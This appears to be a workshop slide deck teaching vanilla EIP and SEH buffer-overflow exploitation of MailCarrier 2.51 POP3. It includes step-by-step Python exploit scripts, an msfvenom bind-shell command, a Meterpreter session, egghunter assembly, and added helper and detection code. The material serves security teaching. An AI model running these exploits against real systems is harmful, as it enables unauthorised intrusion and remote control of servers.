Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows
Instructor - Dino Covotsos - Telspace Systems 
Co-Instructor - Manuel Corregedor 
@telspacesystems 


Whoami (x2)?

We work in the penetration testing space (Telspace Systems)
Approximately 20 years in
Trying to keep some sort of work/life balance! ;)

Various qualifications, degrees, etc.


Agenda 


- Introduction to the workshop (we are here!).
- The stack and registers.
- Basic x86 ASM.
- Basic exploitation techniques.
- Fuzzing.
- Introduction to a variety of skeleton Python scripts (copy/paste buffer overflows, remote buffer overflows, etc.).


Agenda 


- Vanilla EIP overwrites in Immunity Debugger.
- Overwriting EIP, jumping to ESP, executing shellcode (generated by Metasploit or compiled from exploit-db/shell-storm).
- Bad characters and how to deal with them.
- Practical example.


Agenda 


- Introduction to SEH exploitation techniques.
- Introduction to Mona, basic ASM jumps and shellcoding.
- Practical examples.


Agenda 


- What are egghunters?
- Example of an egghunter being used in a SEH exploit.
- Questions and answers.
- References.


The Stack and Registers(x86) 


The 8 32-bit general-purpose registers (the slide names their 16-bit halves; the full 32-bit registers are EAX, ECX, EDX, EBX, ESP, EBP, ESI and EDI):

Accumulator register (AX). Used in arithmetic operations.
Counter register (CX). Used in shift/rotate instructions and loops.
Data register (DX). Used in arithmetic operations and I/O operations.
Base register (BX). Used as a pointer to data (located in segment register DS, when in segmented mode).
Stack Pointer register (SP). Pointer to the top of the stack.
Stack Base Pointer register (BP). Used to point to the base of the stack.
Source Index register (SI). Used as a pointer to a source in stream operations.
Destination Index register (DI). Used as a pointer to a destination in stream operations.


The Stack and Registers (x86)

[Figure: register layout. A 32-bit general-purpose register such as EAX contains a 16-bit half (AX), which in turn splits into two 8-bit halves (AH, AL). ESP is the stack pointer and EBP the base pointer.]

REF: http://flint.cs.yale.edu/cs421/papers/x86-asm/asm.html


Basic x86 ASM 


x86 ASM instructions used in this workshop:


add/sub 

xor 

mov 

push 

pop 

call 

jmp (and conditional jumps) 


Basic exploitation techniques

"Vanilla" EIP overwrite:

Direct EIP overwrite with an initial long buffer (no exception handler or similar involved).

Structured Exception Handling (SEH) exploitation:

An exception is an event that occurs during the execution of a program, and requires the execution of code outside the normal flow of control. Structured exception handling is a mechanism for handling both hardware and software exceptions.

Overwrite the SEH handler pointer with the address of a POP POP RET sequence: the two POPs move ESP 8 bytes up the stack (towards higher addresses), then the RET executes and transfers control to the address now at the top of the stack, which is the nSEH field we control.

REF: https://docs.microsoft.com/en-us/windows/desktop/debug/structured-exception-handling


Basic exploitation techniques

Structured Exception Handling (SEH) exploitation (continued):
Typical structure:

"A" buffer + nSEH (short JMP over the handler address) + SEH (address of POP POP RET) + NOPs + shellcode


Basic exploitation techniques

Egghunters:

An egghunter is a small piece of shellcode that searches memory for a larger, second-stage shellcode and executes it once found. It is useful when only a small amount of space is available in the buffer that we control at the time of the overwrite.

Egghunters search memory for a "TAG", a unique 4-byte string. The tag is written twice in front of the real shellcode (for example WOOTWOOT) so that the 8-byte sequence is unique in memory; once the hunter finds it, execution flow is redirected to the shellcode that follows it.

Hackers for Hire


Basic exploitation techniques

Egghunters, example:

loop_inc_page:
    or dx, 0x0fff           ; add PAGE_SIZE-1 to edx (move to the last byte of the page)
loop_inc_one:
    inc edx                 ; increment our pointer by one
loop_check:
    push edx                ; save edx
    push 0x2                ; push the syscall number of NtAccessCheckAndAuditAlarm
    pop eax                 ; pop it into eax
    int 0x2e                ; perform the syscall
    cmp al, 0x05            ; did we get 0xc0000005 (ACCESS_VIOLATION)?
    pop edx                 ; restore edx
loop_check_8_valid:
    je loop_inc_page        ; yes: invalid pointer, go to the next page
is_egg:
    mov eax, 0x50905090     ; load our egg into eax
    mov edi, edx            ; set edi to the pointer we validated
    scasd                   ; compare the dword at edi to eax
    jnz loop_inc_one        ; no match? increment the pointer by one
    scasd                   ; compare the dword at edi to eax again (edi is now edx + 4)
    jnz loop_inc_one        ; no match? increment the pointer by one
matched:
    jmp edi                 ; found the egg; jump 8 bytes past it into our code
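The search loop above, modelled in Python as an added example (this is neither the workshop's code nor skape's hunter): it runs over a constructed three-page memory image, assumes 4096-byte pages and a page-aligned base address, and replaces the syscall probe with a set of readable page numbers. The image holds a lone copy of the tag on page 0 (as the hunter's own `mov eax` immediate would) and the doubled tag on page 2, which shows why the tag is written twice and why the jump lands 8 bytes past the first match.

```python
import struct

PAGE_SIZE = 4096   # assumed x86 page size; the real hunter relies on it via `or dx, 0x0fff`


def hunt_egg(memory, tag, readable_pages, base=0):
    """Return the address the egghunter would `jmp edi` to, or None if there is no egg.

    memory         -- bytes of the simulated address space that starts at `base`
    tag            -- the 4-byte egg, e.g. b"WOOT"; the payload is prefixed with tag * 2
    readable_pages -- page numbers (relative to base) that the syscall probe reports as
                      readable; every other page is skipped whole, as the hunter does
    """
    if len(tag) != 4:
        raise ValueError("the egg must be exactly 4 bytes")
    egg = struct.unpack("<I", tag)[0]        # the dword the hunter keeps in eax
    edx = base                               # the scan pointer
    end = base + len(memory)
    while edx + 8 <= end:
        if (edx - base) // PAGE_SIZE not in readable_pages:
            # loop_inc_page: `or dx, 0x0fff` then `inc edx` -> first byte of the next page
            edx = (edx | 0x0FFF) + 1
            continue
        off = edx - base
        first = struct.unpack("<I", memory[off:off + 4])[0]        # scasd  (edi == edx)
        if first != egg:
            edx += 1                                               # loop_inc_one
            continue
        second = struct.unpack("<I", memory[off + 4:off + 8])[0]   # scasd  (edi == edx + 4)
        if second != egg:
            edx += 1                                               # a lone copy of the tag
            continue
        return edx + 8                                             # matched: jmp edi
    return None


def build_image():
    """Constructed three-page image: page 0 holds one lone copy of the tag (like the
    immediate inside the hunter itself), page 1 is unmapped, page 2 holds the doubled
    tag followed by the second-stage payload (int3 bytes standing in for shellcode)."""
    tag = b"WOOT"
    payload = b"\xcc" * 32
    page0 = b"\x00" * 100 + tag + b"\x00" * (PAGE_SIZE - 104)
    page1 = b"\xff" * PAGE_SIZE                       # never read: the probe says unmapped
    page2 = b"\x90" * 200 + tag + tag + payload
    page2 += b"\x00" * (PAGE_SIZE - len(page2))
    return page0 + page1 + page2, tag, {0, 2}


def demo(base=0x00400000):
    """Offset (relative to base) the hunter jumps to: 2 pages + 200 bytes + 8 == 8400."""
    image, tag, readable = build_image()
    hit = hunt_egg(image, tag, readable, base)
    return None if hit is None else hit - base


if __name__ == "__main__":
    print("hunter would jump to base + %d" % demo())
```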


Fuzzing 


Google definition:

Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks.

Manual testing (generation-based, mutation-based, hand-written fuzzers, etc.)

Tools: SPIKE, Boofuzz, Peach, Sulley, etc.




Fuzzing

Basic SPIKE template:

s_string_variable("USER");   // fuzzed: the command keyword itself
s_string(" ");
s_string_variable("FOO");    // fuzzed: the username argument
s_string("\r\n");
s_string("PASS ");
s_string_variable("FOO");    // fuzzed: the password argument
s_string_variable("\r\n");   // fuzzed: the line terminator


Skeleton Python Scripts

On your USB/VM there are additional scripts:

Copy/paste skeleton Python script (local BOF example, SEH):

shellcode = "<SHELLCODE>"
# NSEH, SEH and NOPS are filled in per target; the sizes below belong to the sample
buffer = "A" * 884 + NSEH + SEH + NOPS + shellcode + "D" * 8868

payload = buffer
try:
    f = open("exploit.txt", "w")
    print "[+] Creating %s bytes payload.." % len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"


Skeleton Python Scripts 


Socket-based skeleton Python script (Local BOF example, vanilla):

import sys
import socket
import time

# "JMP ESP" is a placeholder for the 4-byte return address; NOPS and shellcode are filled in per target
buffer = "A" * 5094 + "JMP ESP" + NOPS + "C" * (882 - len(shellcode))

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"


Vanilla EIP Overwrite 


41414141 — The Magic Numbers.

Our aim in this portion of the workshop is to overwrite the EIP register by sending a long string, which will allow us to redirect program execution flow to shellcode of our choosing. In this case, it would be calc.exe or a bind shell.


Vanilla EIP Overwrite (MailCarrier)

[Screenshot: MailCarrier 2.5 management console (Server/Domain tree with the Mail Server node)]


Vanilla EIP Overwrite (MailCarrier)

[Screenshot: Immunity Debugger toolbar]

Attaching to the MailCarrier process using Immunity Debugger (on your VM), then Run program <F9>.


Vanilla EIP Overwrite (MailCarrier)

[Screenshot: Immunity Debugger attached to pop3.exe (CPU view, thread 00000F6C, module ntdll); the status bar reads "Running"]

[Screenshot: vanilla1.py open in GNU nano; the script is shown in full on a later slide]

Vanilla EIP Overwrite (MailCarrier)

[Screenshot: Immunity Debugger register pane after the crash]

Vanilla EIP Overwrite (MailCarrier) 


~/hacktobasics# msf-pattern_create -l 6000


Generating a unique pattern with msf-pattern_create, with length 6000.


Vanilla EIP Overwrite (MailCarrier) 


GNU nano 3.2 vanilla1.py Modified

import sys
import socket
import time

# the 6000-byte output of msf-pattern_create, cut short on the slide
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9..."

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

Python script with the unique pattern to send to MailCarrier.


Vanilla EIP Overwrite (MailCarrier) 


~/hacktobasics/Vanilla# python vanilla2-pattern-create.py
[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command

[*] Sending pwnage buffer: with 6000 bytes...
+OK <492.1556614920@>, TABS Lab POP3 server ready.

Executing the script, which carries the unique pattern.


Vanilla EIP Overwrite (MailCarrier) 


[Screenshot: Immunity Debugger registers after the crash; EIP holds a fragment of the pattern (47386E47) and the stack is filled with the Gp.../Gq... part of it]


Vanilla EIP Overwrite (MailCarrier) 


# msf-pattern_offset -q 47386E47
[*] Exact match at offset 5094

Using msf-pattern_offset to obtain the exact offset, in this case 5094 bytes.
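As an added example (not one of the workshop scripts), the cyclic pattern that msf-pattern_create emits and the lookup msf-pattern_offset performs, reimplemented in Python 3 so the offsets on these slides can be reproduced offline: EIP 47386E47 is a little-endian dword, so the bytes that landed on the stack were "Gn8G", which sit at offset 5094 of the pattern; the SEH value 79483978 used later in the workshop resolves to 6178 the same way.

```python
import itertools
import string
import struct

PERIOD = 26 * 26 * 10 * 3   # the pattern only repeats after 20280 bytes


def pattern_create(length):
    """First `length` bytes of the Metasploit cyclic pattern: Aa0Aa1...Aa9Ab0...Zz9.

    Every (upper, lower, digit) triple occurs once per period, so any 4-byte window
    identifies its position uniquely as long as the buffer is shorter than PERIOD."""
    out = bytearray()
    while len(out) < length:
        for upper, lower, digit in itertools.product(
                string.ascii_uppercase, string.ascii_lowercase, string.digits):
            out += (upper + lower + digit).encode("ascii")
            if len(out) >= length:
                break
    return bytes(out[:length])


def pattern_offset(value, length=PERIOD):
    """Offset of `value` in the pattern, as msf-pattern_offset -q reports it.

    `value` is either the register contents as the debugger prints them (a hex
    string such as "47386E47": a little-endian dword, so the bytes that actually sat
    in memory are b"Gn8G") or the raw bytes. Returns None when the value does not
    come from the pattern at all, which is the hint that the overwrite is not a
    direct copy of the input (e.g. 41414141 from the initial "A" buffer)."""
    if isinstance(value, str):
        needle = struct.pack("<I", int(value, 16))
    else:
        needle = bytes(value)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    print("EIP 47386E47 -> offset %s" % pattern_offset("47386E47", 6000))
    print("SEH 79483978 -> offset %s" % pattern_offset("79483978", 10000))
```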




Vanilla EIP Overwrite (MailCarrier) 


GNU nano 3.2 vanilla3-B-Overwrite.py

import sys
import socket
import time

buffer = "A" * 5094 + "B" * 4 + "C" * (6000 - 4 - 5094)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

We create our "B" buffer to confirm the exact offset and the EIP overwrite.


Vanilla EIP Overwrite (MailCarrier)

[Screenshot: Immunity Debugger registers after sending the "B" buffer, confirming the EIP overwrite]

Vanilla EIP Overwrite (MailCarrier) 


[Screenshot: mona output (!mona jmp -r esp) listing JMP ESP addresses in the loaded modules]

!mona jmp -r esp

We search for a JMP ESP to overwrite EIP with, via mona: "!mona jmp -r esp"


Vanilla EIP Overwrite (MailCarrier) 


GNU nano 3.2 vanilla4-jmp-esp.py

import sys
import socket
import time

jmp = "\x59\x30\x02\x1b"   # JMP ESP address found with mona, little-endian
buffer = "A" * 5094 + jmp + "C" * (6000 - 4 - 5094)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"


Vanilla EIP Overwrite (MailCarrier) 


[Screenshot: Immunity Debugger paused at the breakpoint on the JMP ESP; the log reads "[02:11:29] Breakpoint at msjet40.1B023059"]


Vanilla EIP Overwrite (MailCarrier) 


root@pewpew:~# msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with An encoding exception occurred.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 336 (iteration=0)
x86/call4_dword_xor chosen with final size 336
Payload size: 336 bytes
Final size of c file: 1437 bytes



Generating our bind_tcp shellcode, with msfvenom. 


GNU nano 3.2 vanilla5-nops-shellcode.py

import sys
import socket
import time

jmp = "\x59\x30\x02\x1b"   # JMP ESP address, little-endian

# the 336-byte msfvenom bind_tcp payload from the previous slide goes here
shellcode = ("<SHELLCODE>")

Placing it into our Python script (1/2).


Vanilla EIP Overwrite (MailCarrier) 


# 10-byte NOP sled between the JMP ESP and the shellcode; "C" padding fills the buffer to 6000 bytes
buffer = "A" * 5094 + jmp + "\x90" * 10 + shellcode + "C" * (6000 - len(jmp) - len(shellcode) - 5094 - 10)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

Placing it into our Python script (2/2).


Vanilla EIP Overwrite (MailCarrier) 


~/hacktobasics/Vanilla# python vanilla5-nops-shellcode.py
[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command

[*] Sending pwnage buffer: with 6000 bytes...
+OK <3500.1556616527@>, TABS Lab POP3 server ready.


Executing our Python script (full exploit). 


[Screenshot: Immunity Debugger still attached; next to it a command prompt on the target:]

C:\Documents and Settings\test>netstat -an | find "443"
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
  TCP    192.168.0.150:1153     104.244.42.200:443     ESTABLISHED
  TCP    192.168.0.150:1162     216.58.223.67:443      TIME_WAIT
  TCP    192.168.0.150:1163     216.58.223.67:443      TIME_WAIT
  TCP    192.168.0.150:1164     216.58.223.67:443      TIME_WAIT
  TCP    192.168.0.150:1165     216.58.223.67:443      TIME_WAIT

C:\Documents and Settings\test>

The bind shell is listening on port 443 on the target (0.0.0.0:443 LISTENING).

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process                    Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     443                        The listen port
   RHOST     192.168.0.150              The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > run

Started bind TCP handler against 192.168.0.150:443
Sending stage (179779 bytes) to 192.168.0.150
Meterpreter session 1 opened (192.168.0.240:43473 -> 192.168.0.150:443) at 2019-04-30 11:30:28 +0200

meterpreter >


Using Meterpreter to connect to the bind shell. 
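The other side of the walkthrough above, as an added example that is not part of the workshop material: a check that a POP3 proxy, IDS rule or log parser could apply to client commands, flagging what the USER and LIST buffers have in common (an argument far beyond the 40-character limit of RFC 1939, non-printable bytes such as a NOP sled or encoded shellcode, and long runs of a single padding byte). The sample session is constructed; the keyword list and length limits come from RFC 1939.

```python
import re

# RFC 1939 section 3: keywords are 3-4 characters, each argument is at most
# 40 characters, and a command line including CRLF is at most 255 octets.
MAX_ARG_LEN = 40
MAX_LINE_LEN = 255
POP3_KEYWORDS = {b"USER", b"PASS", b"LIST", b"RETR", b"DELE", b"STAT", b"NOOP", b"RSET",
                 b"QUIT", b"TOP", b"UIDL", b"APOP", b"CAPA", b"AUTH", b"STLS"}
NOP_SLED = re.compile(rb"\x90{8,}")              # eight or more consecutive x86 NOPs
PADDING_RUN = re.compile(rb"(.)\1{199,}", re.S)  # 200+ copies of one byte ("A" * N)


def inspect_pop3_command(line):
    """Return a list of findings for one raw client line (bytes, CRLF optional).

    An empty list means the command looks like ordinary POP3 traffic."""
    findings = []
    body = line.rstrip(b"\r\n")
    keyword, _, args = body.partition(b" ")
    keyword = keyword.upper()

    if keyword not in POP3_KEYWORDS:
        findings.append("unknown keyword %r" % keyword[:8])
    if len(body) + 2 > MAX_LINE_LEN:
        findings.append("line of %d bytes exceeds RFC 1939 limit of %d"
                        % (len(body) + 2, MAX_LINE_LEN))
    longest = max((len(a) for a in args.split(b" ")), default=0)
    if longest > MAX_ARG_LEN:
        findings.append("argument of %d bytes after %s (limit %d)"
                        % (longest, keyword.decode("ascii", "replace"), MAX_ARG_LEN))
    if any(b < 0x20 or b > 0x7e for b in args):
        findings.append("non-printable bytes in argument")
    if NOP_SLED.search(args):
        findings.append("NOP sled (0x90 run) in argument")
    run = PADDING_RUN.search(args)
    if run:
        findings.append("%d-byte run of %r padding" % (len(run.group(0)), run.group(1)))
    return findings


def scan_session(lines):
    """Map the index of every flagged line to its findings; benign lines are omitted."""
    report = {}
    for i, line in enumerate(lines):
        findings = inspect_pop3_command(line)
        if findings:
            report[i] = findings
    return report


# Constructed sample session: a normal login, then two oversized commands shaped like
# the ones in the walkthrough (a 6000-byte USER argument with a NOP sled and a
# 336-byte shellcode stand-in, and a 10000-byte LIST argument).
SAMPLE_SESSION = [
    b"USER alice\r\n",
    b"PASS hunter2\r\n",
    b"LIST\r\n",
    b"USER " + b"A" * 5094 + b"BBBB" + b"\x90" * 16 + b"\xcc" * 336 + b"C" * 550 + b"\r\n",
    b"LIST " + b"A" * 10000 + b"\r\n",
    b"RETR 1\r\n",
    b"QUIT\r\n",
]


if __name__ == "__main__":
    for index, findings in sorted(scan_session(SAMPLE_SESSION).items()):
        print("line %d: %s" % (index, "; ".join(findings)))
```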


SEH exploitation 


41414141 — Still the magic numbers, just different! 


Structured exception handling exploits compromise an application by overwriting the pointer of an exception handler with an attacker-controlled address.

The "Structured Exception Handler (SEH)" is a protection mechanism that was implemented to mitigate the abuse of buffer overflows, but it is a highly flawed one.

REF: https://www.fuzzysecurity.com/tutorials/expDev/3.html


GNU nano 3.2 seh1.py

import sys
import socket
import time

buffer = "A" * 10000

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)

print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)

print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)

print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)

s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

Skeleton Python script to exploit the LIST command, post authentication (test/test).


SEH exploitation 


~/hacktobasics/SEH# python seh1.py
[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command

[*] Sending pwnage buffer: with 10000 bytes...
<2260.1556618285@>, TABS Lab POP3 server ready.

[*] Sending USERNAME
test is known here.

[*] Sending PASSWORD
Welcome! 0 messages (0 bytes)

[*] Sending Evil LIST buffer


Sending 10000 A's via the LIST command. 


[Screenshot: Immunity Debugger after sending the LIST buffer (CPU view in pop3.exe, stack and SEH chain panes filled with our data)]

SEH exploitation 


[Screenshot: Immunity Debugger registers (EIP = 41414141) and the SEH chain, whose handler address is also 41414141]

EIP is now overwritten, and so is the SEH chain, with our A's.


SEH exploitation 


~/hacktobasics/SEH# msf-pattern_create -l 10000


In the same way as the previous exploit, we use msf-pattern_create to create a unique pattern of 10000 bytes.


GNU nano 3.2 seh2.py

import sys
import socket
import time

# the 10000-byte output of msf-pattern_create, cut short on the slide
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5..."

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)

print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)

print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)

print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)

s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

Python script with the pattern.


SEH exploitation 


[Screenshot: Immunity Debugger SEH chain view with the handler address overwritten by part of the pattern]

~/hacktobasics/SEH# msf-pattern_offset -q 79483978
[*] Exact match at offset 6178

The SEH chain shows the overwrite; msf-pattern_offset matches the handler value at 6178 bytes (so nSEH, the 4 bytes before it, starts at 6174).


GNU nano 3.2 seh3-SEH-overwrite.py

import sys
import socket
import time

# the B's land in nSEH (offset 6174) and the C's in the SEH handler address (offset 6178)
buffer = "A" * 6174 + "B" * 4 + "C" * 4 + "D" * (10000 - 6174 - 4 - 4)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)

print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)

print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)

print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)


SEH exploitation 


[Screenshot: Immunity Debugger SEH chain view after the B/C buffer]

The SEH chain now shows we control nSEH and SEH accordingly.


SEH exploitation 


[Screenshot: mona output (!mona seh) listing POP POP RET addresses]

!mona seh


GNU nano 3.2 seh4-ppr.py

import sys
import socket
import time

nseh = "G" * 4
seh = "\x0c\x11\x0d\x1b"   # POP POP RET address found with mona, little-endian
buffer = "A" * 6174 + nseh + seh + "D" * (10000 - 6174 - 4 - 4)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." % len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print s.recv(1024)

print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)

print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)

print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)


SEH exploitation

[Screenshot: Immunity Debugger paused at the POP POP RET in msjet40; the log reads "[03:11:29] Breakpoint at msjet40.1B0D110C"]

[Screenshot: disassembly at the nSEH/SEH bytes (0C 11 0D 1B) followed by our D's (44 44 ...) after the RET lands there]


GNU nano 3.2                     seh6-ppr-nseh-seh-nops.py

import sys
import socket
import time

nseh = "\xeb\x12\x90\x90"   # jmp short +0x12: lands 20 bytes past the start of nseh, inside the nop sled
seh = "\x0c\x11\x0d\x1b"    # 0x1B0D110C, pop/pop/ret in msjet40.dll
nops = "\x90" * 20
# the padding subtracts the 20 nops so the buffer still totals 10000 bytes
buffer = "A" * 6174 + nseh + seh + nops + "D" * (10000-6174-4-4-20)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)
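To see why the nseh value "\xeb\x12\x90\x90" works together with a 20-byte nop sled, here is an added example (Python 3, not code from the deck) that builds the same layout as bytes and checks it: it packs the pop/pop/ret address little-endian, decodes where the short jump lands, verifies that the landing point sits inside the nop sled, and scans the bytes that go on the wire for the bad characters the deck later passes to msfvenom. The offsets 6174 and 10000, the address 0x1B0D110C and the bad-character list are taken from the deck's scripts; treat them as assumptions for any other target.

```python
import struct

# Layout constants taken from the deck's seh6/seh7 scripts (assumptions, not measured here)
NSEH_OFFSET = 6174                                  # bytes of 'A' before the nSEH overwrite
TOTAL_LEN = 10000                                   # every buffer the deck sends is 10000 bytes
PPR_ADDR = 0x1B0D110C                               # pop/pop/ret in msjet40.dll from !mona seh
MSFVENOM_BADCHARS = b"\x00\xd5\x0a\x0d\x1a\x03"     # the -b list from the deck's msfvenom command


def pack_addr(addr):
    """x86 is little-endian: 0x1B0D110C must be sent as 0c 11 0d 1b."""
    return struct.pack("<I", addr)


def short_jmp(from_off, to_off):
    """Encode a 2-byte 'jmp short' placed at from_off so that it lands on to_off.
    The displacement is counted from the end of the instruction (from_off + 2)."""
    disp = to_off - (from_off + 2)
    if not -128 <= disp <= 127:
        raise ValueError("jmp short cannot reach a displacement of %d" % disp)
    return b"\xeb" + struct.pack("<b", disp)


def jmp_target(buf, at):
    """Decode the 'jmp short' at buf[at] and return the offset it transfers control to."""
    if buf[at] != 0xEB:
        raise ValueError("no jmp short at offset %d" % at)
    return at + 2 + struct.unpack("<b", buf[at + 1:at + 2])[0]


def find_badchars(data, bad=MSFVENOM_BADCHARS):
    """Every (offset, byte) in data that the target's parser would mangle or truncate on."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_payload(shellcode=b"", nop_count=20, nseh=b"\xeb\x12\x90\x90"):
    """Same layout as seh6/seh7: A*6174 + nseh + seh + nops + shellcode + D padding."""
    seh = pack_addr(PPR_ADDR)
    nops = b"\x90" * nop_count
    pad = TOTAL_LEN - NSEH_OFFSET - len(nseh) - len(seh) - len(nops) - len(shellcode)
    if pad < 0:
        raise ValueError("shellcode of %d bytes does not fit in the buffer" % len(shellcode))
    return b"A" * NSEH_OFFSET + nseh + seh + nops + shellcode + b"D" * pad


def jump_lands_in_sled(payload, nop_count=20):
    """True if the nseh jump lands somewhere inside the nop sled that follows seh."""
    sled_start = NSEH_OFFSET + 8                    # after nseh (4 bytes) and seh (4 bytes)
    target = jmp_target(payload, NSEH_OFFSET)
    return sled_start <= target < sled_start + nop_count


if __name__ == "__main__":
    p = build_payload()
    print("length %d, nseh jumps to offset %d (sled starts at %d)"
          % (len(p), jmp_target(p, NSEH_OFFSET), NSEH_OFFSET + 8))
    print("minimal jump to the first nop:", short_jmp(NSEH_OFFSET, NSEH_OFFSET + 8).hex())
    print("bad chars in the seh address:", find_badchars(pack_addr(PPR_ADDR)))
```

Running it reports that the jump from offset 6174 lands at 6194, twelve bytes into the sled, and short_jmp(6174, 6182) gives the minimal "\xeb\x06" that would land exactly on the first nop. The bad-character scan also flags the 0x0d inside the pop/pop/ret address, a byte that is in the list given to msfvenom; the deck's exploit still runs, so treat that as a prompt to confirm in the debugger that the SE handler value arrived intact, not as a hard failure.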


SEH exploitation


